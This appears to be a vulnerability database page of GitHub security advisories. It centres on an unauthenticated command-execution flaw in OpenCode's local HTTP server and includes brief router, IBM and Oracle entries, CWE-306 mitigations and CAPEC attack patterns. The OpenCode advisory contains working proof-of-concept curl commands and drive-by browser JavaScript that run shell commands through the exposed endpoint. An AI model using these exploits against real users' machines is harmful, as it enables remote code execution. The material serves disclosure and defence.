OpenCode automatically starts an unauthenticated HTTP server that allows any local process—or any website via permissive CORS—to execute arbitrary shell commands with the user's privileges.

Details

When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:

  • POST /session/:id/shell - Execute shell commands (server.ts:1401)
  • POST /pty - Create interactive terminal sessions (server.ts:267)
  • GET /file/content?path= - Read arbitrary files (server.ts:1868)

The server is started automatically in cli/cmd/tui/worker.ts:36 via Server.listen().

No authentication middleware exists in server/server.ts. The server uses permissive CORS (.use(cors()) with default Access-Control-Allow-Origin: *), enabling browser-based exploitation.

PoC

Local exploitation:

API="http://127.0.0.1:4096"  # update with actual port
SESSION_ID=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION_ID/shell" -H "Content-Type: application/json" \
  -d '{"agent": "build", "command": "echo PWNED > /tmp/pwned.txt"}'
cat /tmp/pwned.txt  # outputs: PWNED

Browser-based exploitation:

A malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.

// Malicious website JavaScript
fetch('http://127.0.0.1:4096/session', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: '{}'
})
.then(r => r.json())
.then(session => {
  fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({agent: 'build', command: 'id > /tmp/pwned.txt'})
  });
});

Note: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.

Impact

Remote Code Execution via two vectors:

  1. Local process: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.

  2. Browser-based (confirmed in Firefox): Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.

With --mdns flag, the server binds to 0.0.0.0 and advertises via Bonjour, extending the attack surface to the entire local network.

Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "opencode-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.216"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22812"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-749",
      "CWE-942"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-13T20:35:08Z",
    "nvd_published_at": "2026-01-12T23:15:53Z",
    "severity": "HIGH"
  },
  "details": "*Previously reported via email to support@sst.dev on 2025-11-17 per the security policy in [opencode-sdk-js/SECURITY.md](https://github.com/sst/opencode-sdk-js/blob/main/SECURITY.md). No response received.*\n\n### Summary\n\nOpenCode automatically starts an unauthenticated HTTP server that allows any local process\u2014or any website via permissive CORS\u2014to execute arbitrary shell commands with the user\u0027s privileges.\n\n### Details\n\nWhen OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:\n\n- `POST /session/:id/shell` - Execute shell commands (`server.ts:1401`)\n- `POST /pty` - Create interactive terminal sessions (`server.ts:267`)\n- `GET /file/content?path=` - Read arbitrary files (`server.ts:1868`)\n\nThe server is started automatically in `cli/cmd/tui/worker.ts:36` via `Server.listen()`.\n\nNo authentication middleware exists in `server/server.ts`. The server uses permissive CORS (`.use(cors())` with default `Access-Control-Allow-Origin: *`), enabling browser-based exploitation.\n\n### PoC\n\n**Local exploitation:**\n\n```bash\nAPI=\"http://127.0.0.1:4096\"  # update with actual port\nSESSION_ID=$(curl -s -X POST \"$API/session\" -H \"Content-Type: application/json\" -d \u0027{}\u0027 | jq -r \u0027.id\u0027)\ncurl -s -X POST \"$API/session/$SESSION_ID/shell\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"agent\": \"build\", \"command\": \"echo PWNED \u003e /tmp/pwned.txt\"}\u0027\ncat /tmp/pwned.txt  # outputs: PWNED\n```\n\n**Browser-based exploitation:**\n\nA malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.\n\n```javascript\n// Malicious website JavaScript\nfetch(\u0027http://127.0.0.1:4096/session\u0027, {\n  method: \u0027POST\u0027,\n  headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n  body: \u0027{}\u0027\n})\n.then(r =\u003e r.json())\n.then(session =\u003e {\n  fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {\n    method: \u0027POST\u0027,\n    headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n    body: JSON.stringify({agent: \u0027build\u0027, command: \u0027id \u003e /tmp/pwned.txt\u0027})\n  });\n});\n```\n\nNote: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.\n\n### Impact\n\n**Remote Code Execution** via two vectors:\n\n1. **Local process**: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.\n\n2. **Browser-based (confirmed in Firefox)**: Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.\n\nWith `--mdns` flag, the server binds to `0.0.0.0` and advertises via Bonjour, extending the attack surface to the entire local network.\n\n*Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.*",
  "id": "GHSA-vxw4-wv6m-9hhh",
  "modified": "2026-01-13T20:35:08Z",
  "published": "2026-01-13T20:35:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22812"
    },
    {
      "type": "WEB",
      "url": "https://github.com/anomalyco/opencode/commit/7d2d87fa2c44e32314015980bb4e59a9386e858c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/anomalyco/opencode"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenCode\u0027s Unauthenticated HTTP Server Allows Arbitrary Command Execution"
}

GHSA-VXW6-RGVR-442H

Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2024-04-04 00:37
VLAI
Details

An issue was discovered on LG GAMP-7100, GAPM-7200, and GAPM-8000 routers. An unauthenticated user can read a log file via an HTTP request containing its full pathname, such as http://192.168.0.1/var/gapm7100_${today's_date}.log for reading a filename such as gapm7100_190101.log.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-7404"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-13T14:29:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered on LG GAMP-7100, GAPM-7200, and GAPM-8000 routers. An unauthenticated user can read a log file via an HTTP request containing its full pathname, such as http://192.168.0.1/var/gapm7100_${today\u0027s_date}.log for reading a filename such as gapm7100_190101.log.",
  "id": "GHSA-vxw6-rgvr-442h",
  "modified": "2024-04-04T00:37:18Z",
  "published": "2022-05-24T16:45:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7404"
    },
    {
      "type": "WEB",
      "url": "https://github.com/epistemophilia/CVEs/blob/master/LG-GAMP-Routers/CVE-2019-7404/poc-cve-2019-7404.py"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VXWP-6HPW-P9G4

Vulnerability from github – Published: 2023-10-23 18:30 – Updated: 2024-04-04 08:53
VLAI
Details

IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 could allow a remote user to perform unauthorized actions due to improper authentication. IBM X-Force ID: 266896.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43045"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-23T18:15:10Z",
    "severity": "HIGH"
  },
  "details": "IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 could allow a remote user to perform unauthorized actions due to improper authentication.  IBM X-Force ID:  266896.",
  "id": "GHSA-vxwp-6hpw-p9g4",
  "modified": "2024-04-04T08:53:19Z",
  "published": "2023-10-23T18:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43045"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266896"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7057409"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W2J6-P7C6-6CPJ

Vulnerability from github – Published: 2026-04-21 21:31 – Updated: 2026-04-21 21:31
VLAI
Details

Vulnerability in the Oracle Identity Manager Connector product of Oracle Fusion Middleware (component: Core). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Identity Manager Connector. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Identity Manager Connector accessible data as well as unauthorized access to critical data or complete access to all Oracle Identity Manager Connector accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-34285"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-21T21:16:33Z",
    "severity": "CRITICAL"
  },
  "details": "Vulnerability in the Oracle Identity Manager Connector product of Oracle Fusion Middleware (component: Core).   The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Identity Manager Connector.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Identity Manager Connector accessible data as well as  unauthorized access to critical data or complete access to all Oracle Identity Manager Connector accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).",
  "id": "GHSA-w2j6-p7c6-6cpj",
  "modified": "2026-04-21T21:31:25Z",
  "published": "2026-04-21T21:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34285"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2026.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.
  • Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected, including those channels that are assumed to be accessible only by authorized parties. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.
  • In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation
Architecture and Design
  • Where possible, avoid implementing custom, "grow-your-own" authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These capabilities may avoid common weaknesses that are unique to authentication; support automatic auditing and tracking; and make it easier to provide a clear separation between authentication tasks and authorization tasks.
  • In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly.
Mitigation MIT-4.5
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45].
Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302].

CAPEC-12: Choosing Message Identifier

This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.

CAPEC-166: Force the System to Reset Values

An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.

CAPEC-216: Communication Channel Manipulation

An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.

CAPEC-36: Using Unpublished Interfaces or Functionality

An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.

CAPEC-62: Cross Site Request Forgery

An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.